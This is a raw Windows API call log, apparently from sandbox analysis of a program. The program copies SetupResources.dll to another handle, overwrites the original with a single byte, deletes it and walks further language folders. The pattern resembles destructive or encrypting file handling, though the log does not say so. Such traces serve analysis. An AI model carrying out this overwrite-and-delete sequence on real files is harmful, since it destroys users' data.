CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1035\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1035\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0066.362] GetFileType (hFile=0x420) returned 0x1 [0066.362] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x716f0 | out: hHeap=0x20000) returned 1 [0066.362] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x69db0 [0066.362] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0066.362] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0066.362] GetLastError () returned 0x0 [0066.362] SetLastError (dwErrCode=0x0) [0066.362] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0066.362] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0066.362] GetLastError () returned 0x0 [0066.362] SetLastError (dwErrCode=0x0) [0066.362] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0066.362] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0066.363] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0066.363] ReadFile (in: hFile=0x420, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0066.365] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0066.365] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d4e0 [0066.365] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x85fc0 [0066.366] GetLastError () returned 0x0 [0066.366] SetLastError (dwErrCode=0x0) [0066.366] GetLastError () returned 0x0 [0066.366] SetLastError (dwErrCode=0x0) [0066.366] GetLastError () returned 0x0 [0066.366] SetLastError (dwErrCode=0x0) [0066.366] GetLastError () returned 0x0 [0066.366] SetLastError (dwErrCode=0x0) [0066.366] ReadFile (in: hFile=0x420, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0066.366] WriteFile (in: hFile=0x428, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0066.367] GetLastError () returned 0x0 [0066.367] SetLastError (dwErrCode=0x0) [0066.367] GetLastError () returned 0x0 [0066.367] SetLastError (dwErrCode=0x0) [0066.367] GetLastError () returned 0x0 [0066.367] SetLastError (dwErrCode=0x0) [0066.368] GetLastError () returned 0x0 [0066.368] SetLastError (dwErrCode=0x0) [0066.368] ReadFile (in: hFile=0x420, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0066.368] WriteFile (in: hFile=0x428, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0066.368] GetLastError () returned 0x0 [0066.368] SetLastError (dwErrCode=0x0) [0066.368] GetLastError () returned 0x0 [0066.368] SetLastError (dwErrCode=0x0) [0066.368] GetLastError () returned 0x0 [0066.368] SetLastError (dwErrCode=0x0) [0066.368] GetLastError () returned 0x0 [0066.368] SetLastError (dwErrCode=0x0) [0066.369] ReadFile (in: hFile=0x420, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0066.369] WriteFile (in: hFile=0x428, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0066.369] GetLastError () returned 0x0 [0066.369] SetLastError (dwErrCode=0x0) [0066.369] GetLastError () returned 0x0 [0066.369] SetLastError (dwErrCode=0x0) [0066.369] GetLastError () returned 0x0 [0066.369] SetLastError (dwErrCode=0x0) [0066.369] GetLastError () returned 0x0 [0066.369] SetLastError (dwErrCode=0x0) [0066.369] ReadFile (in: hFile=0x420, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x758, lpOverlapped=0x0) returned 1 [0066.370] WriteFile (in: hFile=0x428, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0066.370] GetLastError () returned 0x0 [0066.370] SetLastError (dwErrCode=0x0) [0066.370] ReadFile (in: hFile=0x420, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0066.370] GetLastError () returned 0x0 [0066.370] SetLastError (dwErrCode=0x0) [0066.370] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0066.370] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d780 [0066.370] GetLastError () returned 0x0 [0066.370] SetLastError (dwErrCode=0x0) [0066.370] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d4e0 | out: hHeap=0x20000) returned 1 [0066.370] WriteFile (in: hFile=0x428, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x760, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327ef70*=0x760, lpOverlapped=0x0) returned 1 [0066.371] GetLastError () returned 0x0 [0066.371] SetLastError (dwErrCode=0x0) [0066.371] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0066.371] GetLastError () returned 0x0 [0066.371] SetLastError (dwErrCode=0x0) [0066.371] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0066.371] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0066.371] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d780 | out: hHeap=0x20000) returned 1 [0066.371] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0066.371] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0066.371] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85fc0 | out: hHeap=0x20000) returned 1 [0066.371] CloseHandle (hObject=0x428) returned 1 [0066.372] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0066.372] CloseHandle (hObject=0x420) returned 1 [0066.372] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0066.372] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0066.373] AreFileApisANSI () returned 1 [0066.373] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0066.373] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71960 [0066.373] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1035\\SetupResources.dll") returned 46 [0066.373] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1035\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1035\\setupresources.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0066.374] GetFileType (hFile=0x420) returned 0x1 [0066.374] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0066.374] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0066.374] GetLastError () returned 0xb7 [0066.374] SetLastError (dwErrCode=0xb7) [0066.374] WriteFile (in: hFile=0x420, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0066.375] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0066.375] CloseHandle (hObject=0x420) returned 1 [0066.379] AreFileApisANSI () returned 1 [0066.379] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0066.379] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71960 [0066.379] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1035\\SetupResources.dll") returned 46 [0066.379] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1035\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1035\\setupresources.dll")) returned 1 [0066.380] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0066.380] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0066.380] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0066.380] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0066.380] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0066.380] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0066.380] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0066.380] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5e570 | out: hHeap=0x20000) returned 1 [0066.381] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d6a8 | out: hHeap=0x20000) returned 1 [0066.381] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d6d8 | out: hHeap=0x20000) returned 1 [0066.381] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a210 | out: hHeap=0x20000) returned 1 [0066.381] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b9c8 | out: hHeap=0x20000) returned 1 [0066.381] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0066.381] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0066.381] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0066.381] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0066.381] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0066.381] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0066.381] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.381] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.381] FindNextFileW (in: hFindFile=0x78310, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x1, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x2f0, ftLastWriteTime.dwHighDateTime=0x1, nFileSizeHigh=0x0, nFileSizeLow=0x28bf8, dwReserved0=0x1, dwReserved1=0x0, cFileName="", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧賂̧⺊Ā̧붼聐̧㑍Ā̧茐\x07̧비聐薸\x08賂̧")) returned 0 [0066.381] FindClose (in: hFindFile=0x78310 | out: hFindFile=0x78310) returned 1 [0066.381] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0066.381] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0066.381] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0066.381] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0066.381] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0066.381] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0066.381] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0066.381] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0066.381] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0066.381] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46048 | out: hHeap=0x20000) returned 1 [0066.381] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0066.381] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0066.381] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0066.381] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0066.381] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0066.381] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0066.381] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0066.381] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0066.381] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0066.381] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x690d0 [0066.382] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0066.382] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0066.382] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x690d0 | out: hHeap=0x20000) returned 1 [0066.382] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.382] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.382] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.382] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.382] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0066.382] AreFileApisANSI () returned 1 [0066.382] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1036", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1036", lpUsedDefaultChar=0x0) returned 27 [0066.382] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0066.382] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.382] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.382] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0066.382] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0066.382] AreFileApisANSI () returned 1 [0066.382] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0066.382] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x78510 [0066.382] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x78510, cchWideChar=27 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1036") returned 27 [0066.382] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1036" (normalized: "c:\\588bce7c90097ed212\\1036"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0066.382] GetLastError () returned 0x5 [0066.382] GetLastError () returned 0x5 [0066.382] SetLastError (dwErrCode=0x5) [0066.382] GetLastError () returned 0x5 [0066.382] SetLastError (dwErrCode=0x5) [0066.382] GetLastError () returned 0x5 [0066.382] SetLastError (dwErrCode=0x5) [0066.382] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78510 | out: hHeap=0x20000) returned 1 [0066.383] AreFileApisANSI () returned 1 [0066.383] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0066.383] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x78090 [0066.383] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x78090, cchWideChar=27 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1036") returned 27 [0066.383] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1036" (normalized: "c:\\588bce7c90097ed212\\1036"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0066.383] GetLastError () returned 0x5 [0066.383] GetLastError () returned 0x5 [0066.383] SetLastError (dwErrCode=0x5) [0066.383] GetLastError () returned 0x5 [0066.383] SetLastError (dwErrCode=0x5) [0066.383] GetLastError () returned 0x5 [0066.383] SetLastError (dwErrCode=0x5) [0066.383] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78090 | out: hHeap=0x20000) returned 1 [0066.383] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0066.383] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0066.383] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0066.383] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.383] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.383] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.383] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.383] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0066.383] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68f40 [0066.383] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0066.383] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0066.383] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0066.383] FindNextFileW (in: hFindFile=0x78950, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="1037", cAlternateFileName="")) returned 1 [0066.383] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0066.383] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0066.383] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0066.383] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0066.384] FindFirstFileExW (in: lpFileName="C:\\588bce7c90097ed212\\1036\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78450 [0066.384] FindNextFileW (in: hFindFile=0x78450, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.384] FindNextFileW (in: hFindFile=0x78450, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xdc6, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0066.384] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0066.384] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0066.384] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0066.384] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0066.384] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0066.384] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0066.384] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0066.384] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0066.384] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0066.384] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0066.384] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0066.384] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x462e8 [0066.384] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0066.384] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0066.384] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0066.384] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0066.384] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0066.384] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0066.384] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0066.384] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0066.384] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0066.384] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0066.384] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0066.384] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0066.384] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71960 [0066.384] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0066.384] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0066.384] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0066.384] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0066.384] 